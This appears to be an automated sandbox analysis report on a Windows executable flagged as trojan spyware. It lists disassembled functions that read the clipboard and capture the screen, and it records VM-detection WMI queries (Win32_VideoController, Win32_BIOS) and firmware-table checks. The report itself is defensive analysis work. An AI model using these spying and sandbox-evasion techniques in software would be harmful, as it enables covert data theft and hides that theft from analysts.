Code function: 1_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_004363E0

Source: C:\Users\user\Desktop\random.exe

Code function: 1_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_004363E0

Source: C:\Users\user\Desktop\random.exe

Code function: 1_2_00436590 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

1_2_00436590

Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00420440	1_2_00420440
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00410446	1_2_00410446
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00442460	1_2_00442460
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0040D690	1_2_0040D690
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00408740	1_2_00408740
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0043B7B0	1_2_0043B7B0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00415975	1_2_00415975
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00427A50	1_2_00427A50
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00440A0D	1_2_00440A0D
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00442DE0	1_2_00442DE0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00423E44	1_2_00423E44
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0042DEE5	1_2_0042DEE5
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00430050	1_2_00430050
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00411078	1_2_00411078
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004270D0	1_2_004270D0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00436140	1_2_00436140
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0043912C	1_2_0043912C
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004091C0	1_2_004091C0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004161DF	1_2_004161DF
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004311E6	1_2_004311E6
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00432188	1_2_00432188
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00406190	1_2_00406190
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0042F195	1_2_0042F195
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004421B0	1_2_004421B0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0041E250	1_2_0041E250
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00445260	1_2_00445260
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0041B200	1_2_0041B200
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004042D0	1_2_004042D0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004082A0	1_2_004082A0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004412B1	1_2_004412B1
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0041C370	1_2_0041C370
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004273A0	1_2_004273A0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00417451	1_2_00417451
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00419470	1_2_00419470
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00407400	1_2_00407400
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0043C410	1_2_0043C410
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0040E4B0	1_2_0040E4B0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0041A574	1_2_0041A574
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004245C0	1_2_004245C0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004165EE	1_2_004165EE
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00415590	1_2_00415590
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004095A0	1_2_004095A0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00406620	1_2_00406620
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00418690	1_2_00418690
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0043974A	1_2_0043974A
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00419710	1_2_00419710
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0041F710	1_2_0041F710
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0041C7D0	1_2_0041C7D0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004427E0	1_2_004427E0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0042A810	1_2_0042A810
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00433810	1_2_00433810
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004058E0	1_2_004058E0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0042D893	1_2_0042D893
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004148B0	1_2_004148B0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004288BA	1_2_004288BA
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0040A910	1_2_0040A910
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00441910	1_2_00441910
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00403920	1_2_00403920
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00441A56	1_2_00441A56
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0041BAD0	1_2_0041BAD0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00433AD0	1_2_00433AD0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00431A88	1_2_00431A88
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00441A94	1_2_00441A94
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0041AA90	1_2_0041AA90
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00442A90	1_2_00442A90
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0041CAA0	1_2_0041CAA0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0043CAA7	1_2_0043CAA7
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00441B40	1_2_00441B40
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00420B10	1_2_00420B10
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00402B20	1_2_00402B20
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00411B20	1_2_00411B20
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0042ABC0	1_2_0042ABC0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00441BD0	1_2_00441BD0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0043AC40	1_2_0043AC40
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00441C60	1_2_00441C60
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00404C00	1_2_00404C00
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0042ECD0	1_2_0042ECD0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00439CD8	1_2_00439CD8
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00440CD8	1_2_00440CD8
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00414C9C	1_2_00414C9C
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0042CCA0	1_2_0042CCA0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00426D70	1_2_00426D70
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00428D76	1_2_00428D76
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00422D17	1_2_00422D17
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00405DC0	1_2_00405DC0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00415E42	1_2_00415E42
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00413E50	1_2_00413E50
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0040AE60	1_2_0040AE60
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0041BE00	1_2_0041BE00
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00402EF0	1_2_00402EF0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0043EE80	1_2_0043EE80
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0043AEA0	1_2_0043AEA0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00427F8D	1_2_00427F8D

Source: C:\Users\user\Desktop\random.exe	Code function: String function: 00413E40 appears 128 times
Source: C:\Users\user\Desktop\random.exe	Code function: String function: 00407F90 appears 52 times

Source: C:\Users\user\Desktop\random.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 912

Source: random.exe

Static PE information: invalid certificate

Source: random.exe, 00000000.00000002.2084830653.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs random.exe
Source: random.exe, 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs random.exe
Source: random.exe, 00000000.00000000.2052930498.0000000000628000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs random.exe
Source: random.exe	Binary or memory string: OriginalFilenameHandler.exe0 vs random.exe

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: random.exe

Static PE information: Section: .idata ZLIB complexity 1.0003307208466454

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/5@1/1

Source: C:\Users\user\Desktop\random.exe

Code function: 1_2_0043B7B0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

1_2_0043B7B0

Source: C:\Users\user\Desktop\random.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2472

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\eef4d2ac-b383-4471-9328-7805f048fd90

Jump to behavior

Source: random.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: random.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\random.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: random.exe

Virustotal: Detection: 48%

Source: C:\Users\user\Desktop\random.exe

File read: C:\Users\user\Desktop\random.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 912
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"	Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: random.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: random.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: random.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Windows.Forms.pdb source: WERE46B.tmp.dmp.3.dr
Source:	Binary string: System.Windows.Forms.pdbH source: WERE46B.tmp.dmp.3.dr
Source:	Binary string: mscorlib.pdb source: WERE46B.tmp.dmp.3.dr
Source:	Binary string: System.ni.pdbRSDS source: WERE46B.tmp.dmp.3.dr
Source:	Binary string: mscorlib.ni.pdb source: WERE46B.tmp.dmp.3.dr
Source:	Binary string: Kamnler.pdb source: random.exe, WERE46B.tmp.dmp.3.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERE46B.tmp.dmp.3.dr
Source:	Binary string: Kamnler.pdb(b>b 0b_CorExeMainmscoree.dll source: random.exe
Source:	Binary string: System.ni.pdb source: WERE46B.tmp.dmp.3.dr
Source:	Binary string: System.pdb source: WERE46B.tmp.dmp.3.dr

Source: random.exe

Static PE information: 0xC3D3DB3B [Fri Feb 9 22:35:39 2074 UTC]

Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_0043A6F5 push esi; retf		1_2_0043A6FE
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00441860 push eax; mov dword ptr [esp], 424D4C7Fh		1_2_00441864

Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\random.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\random.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Memory allocated: 2790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Memory allocated: 2A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Memory allocated: 2790000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\random.exe TID: 2636	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 1848	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\random.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: random.exe, 00000001.00000002.2152874638.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000001.00000002.2152828295.00000000012C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: random.exe, 00000001.00000002.2152874638.00000000012FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%tKw
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual RAM
